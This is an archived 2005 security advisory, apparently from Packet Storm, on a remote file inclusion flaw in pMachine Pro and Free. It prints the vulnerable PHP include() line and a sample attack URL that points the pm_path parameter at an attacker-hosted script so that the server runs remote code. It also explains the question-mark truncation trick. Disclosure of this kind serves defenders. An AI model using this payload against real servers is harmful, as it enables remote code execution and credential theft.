what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

pmachineExec.txt

pmachineExec.txt
Posted Feb 25, 2005
Authored by Kingcope

A lack of variable sanitizing in PMachine online publishing tools allows for remote command execution as the webserver uid.

tags | exploit, remote
SHA-256 | ab8fc76302a0a123e56195c679505ef1828d4ebb0b8c213d36d40d75809bfbae

pmachineExec.txt

Change Mirror Download
This is a multi-part message in MIME format.

------=_NextPart_000_0000_01C516AC.9C269F50
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit

pMachine Pro / pMachine Free Remote Code Execution
vendor website: http://www.pmachine.com

I. BACKGROUND
PMachine is one of the most flexible & creative on-line publishing
tools available. With PMachine you can publish any kind of
web content - from a basic weblog to an advanced, interactive magazine.
Easy to use, even for those new to BLOGing!
Even the most inexperienced user can have their weblog up and running
in 10 minutes or less.

II. DESCRIPTION
A remote attacker is able to execute commands with the privileges
of the underlying webserver. Under special circumstances the attacker
is also in place to escalate his privileges and gain full access to the
affected system.

The file containing the vulnerability is placed at

pm/add_ons/mail_this_entry/mail_autocheck.php

from the pMachine root directory. This file contains the following
PHP code:

<?php include($pm_path."mailserver".$sfx); ?>

as no check was done to the user supplied $pm_path variable it
is possible to include a remote php script and take advantage of
this typical PHP include() vulnerability.

Followed is a sample attack to the pMachine hosting server:
http://targetserver/pMachine/pm/add_ons/mail_this_entry/
mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php?

The question mark at the very end of this URL will truncate the
appended "mailserver".$sfx of the vulnerable pMachine code.

III. ANALYSIS

Remote exploitation allows an attacker to execute arbitrary commands
and code under the privileges of the web server. This also opens the
door to privilege escalation attacks.
In junction with other unpatched vulnerabilities (the recent curl issue)
the attacker is able to read any file on the system even without
escalating his privileges.
For example on an shared website server and read out secret account
credentials.

IV. DETECTION
The latest pMachine Pro and pMachine Free release is vulnerable to
the attack described above.

kcope - kingcope[at]gmx.net


------=_NextPart_000_0000_01C516AC.9C269F50
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dus-ascii">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR></HEAD>
<BODY>
<DIV><FONT face=3DArial size=3D2>pMachine Pro / pMachine Free Remote =
Code=20
Execution<BR>vendor website: <A=20
href=3D"http://www.pmachine.com">http://www.pmachine.com</A></FONT></DIV>=

<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>I. BACKGROUND<BR>PMachine is one of the =
most=20
flexible & creative on-line publishing<BR>tools available.&nbsp; =
With=20
PMachine you can publish any kind of<BR>web content - from a basic =
weblog to an=20
advanced, interactive magazine.<BR>Easy to use, even for those new to=20
BLOGing!<BR>Even the most inexperienced user can have their weblog up =
and=20
running<BR>in 10 minutes or less.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>II. DESCRIPTION<BR>A remote attacker is =
able to=20
execute commands with the privileges<BR>of the underlying webserver. =
Under=20
special circumstances the attacker<BR>is also in place to escalate his=20
privileges and gain full access to the<BR>affected system.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>The file containing the vulnerability =
is placed=20
at</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial=20
size=3D2>pm/add_ons/mail_this_entry/mail_autocheck.php</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>from the pMachine root directory. This =
file=20
contains the following<BR>PHP code:</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><?php =
include($pm_path."mailserver".$sfx);=20
?></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>as no check was done to the user =
supplied $pm_path=20
variable it<BR>is possible to include a remote php script and take =
advantage=20
of<BR>this typical PHP include() vulnerability.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Followed is a sample attack to the =
pMachine hosting=20
server:<BR><A=20
href=3D"http://targetserver/pMachine/pm/add_ons/mail_this_entry/">http://=
targetserver/pMachine/pm/add_ons/mail_this_entry/</A><BR>mail_autocheck.p=
hp?pm_path=3Dhttp://attackers-webserver/malicious-code.php?</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>The question mark at the =
very&nbsp;<SPAN=20
class=3D730425616-19022005>e</SPAN>nd of this URL will truncate =
the<BR>appended=20
"mailserver".$sfx of the vulnerable pMachine code.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>III. ANALYSIS</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Remote exploitation allows an attacker =
to execute=20
arbitrary commands<BR>and code under the privileges of the web server. =
This also=20
opens the<BR>door to privilege escalation attacks.<BR>In junction with =
other=20
unpatched vulnerabilities (the recent curl issue)<BR>the attacker is =
able to=20
read any file on the system even without<BR>escalating his =
privileges.<BR>For=20
example on an shared website server and read out secret=20
account<BR>credentials.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>IV. DETECTION<BR>The latest pMachine =
Pro and=20
pMachine Free release is vulnerable to<BR>the attack described=20
above.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>kcope - =
kingcope[at]gmx.net</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML>

------=_NextPart_000_0000_01C516AC.9C269F50--

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close